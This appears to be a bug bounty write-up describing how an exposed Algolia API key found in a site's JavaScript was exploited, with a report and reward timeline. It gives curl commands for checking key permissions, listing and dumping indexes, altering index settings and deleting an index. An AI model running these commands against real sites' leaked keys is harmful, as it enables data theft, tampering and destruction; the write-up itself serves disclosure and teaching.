Algolia API Key Exploitation leads to $1000 Bounty (P2) on Private program
Hi Everyone this is Suryesh a Bug Hunter from India. In this write-up i’ll explain how you can exploit Algolia API Key and earn $$$$.
Summary:
Algolia is a search API that powers the search function of over 50,000 sites. The Algolia API lets you set custom search suggestions using a company-defined index filled with searchable content. If the API is misconfigured and has the ‘listIndexes’ permission, it allows you to view all available indexes, sometimes including sensitive internal company documents. There are other permissions that can also be damaging. For instance, the ‘editSettings’ permission allows you to define JavaScript that runs when the search is used. As you can imagine, this can be quite dangerous for a large site with a lot of traffic.
I Found api key in main.js file
To exploit this vulnerability we will use curl command. So Now follow step-by-step:
Steps 1:
First of all we have to check acl permission to check what are the permission has been given to this API-key. To check acl use this curl command:
curl "https://{appID}-dsn.algolia.net/1/keys/{api-key}?x-algolia-application-id={appID}&x-algolia-api-key={api-key}" | jqIf you got acl like addObject, deleteObject, deleteIndex, editSettings, etc. then good to go and if you got acl only search, listIndex, settings then it’s Informative because you can’t perform Update action.
Steps 2:
Now check indexes of API key
curl -X GET -H "X-Algolia-API-Key: {api-key}" -H "X-Algolia-Application-Id: {appID}" "https://{appID}-dsn.algolia.net/1/indexes/" | jqIndexes will be look like this:
Steps 3:
Now Check the data of Indexes by using this curl command
curl -X GET -H "X-Algolia-API-Key: {apikey}" -H "X-Algolia-Application-Id: {appID}" "https://{appID}-dsn.algolia.net/1/indexes/{index_name}" | jqIt will look like this:
Steps 4:
Now Check setting Configuration of indexes list, to check use this curl command
curl -X GET -H "X-Algolia-API-Key: {apiKey}" -H "X-Algolia-Application-Id: {appID}" "https://{appID}-dsn.algolia.net/1/indexes/{Index_Name}/settings" | jqIt will look like this
Steps 6:
Update some data using this curl command
curl --request PUT --url https://{appID}-1.algolianet.com/1/indexes/{Index_Name}/settings --header 'content-type: application/json' --header 'x-algolia-api-key: {apiKey}' --header 'x-algolia-application-id: appID' --data '{"highlightPreTag": "hacked"}'
It will look like this
Steps 7:
Deleting index, But this is prohibited action by any program. You can’t delete any data rather than retrieve, update. so always avoid to delete any kind of data.
To Delete data use this curl command
curl -X DELETE "https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"Impact:
- An attacker could access internal documents, potentially leaking confidential business information, customer data, or other sensitive materials.
- By modifying the index settings, an attacker could inject malicious JavaScript. This could lead to widespread exploitation, such as stealing user credentials, payment information, and other personal data from users interacting with the search functionality on the affected site.
- An attacker could alter or corrupt indexes, causing significant disruption to the site’s search functionality. This could degrade user experience, lead to loss of business, and damage the company’s reputation.
- With the ability to modify settings, an attacker could potentially escalate their access, gaining further control over the system and causing even more damage.
- Exposure of sensitive data and potential theft of personal information could result in significant financial loss and legal liabilities, including fines and lawsuits for failing to protect user data.
Report Sent on: June 14, 2024
Rewarded on: June 30, 2024
Triaged on: July 03, 2024
If you Learned something and want to Donate then Please Donate here.
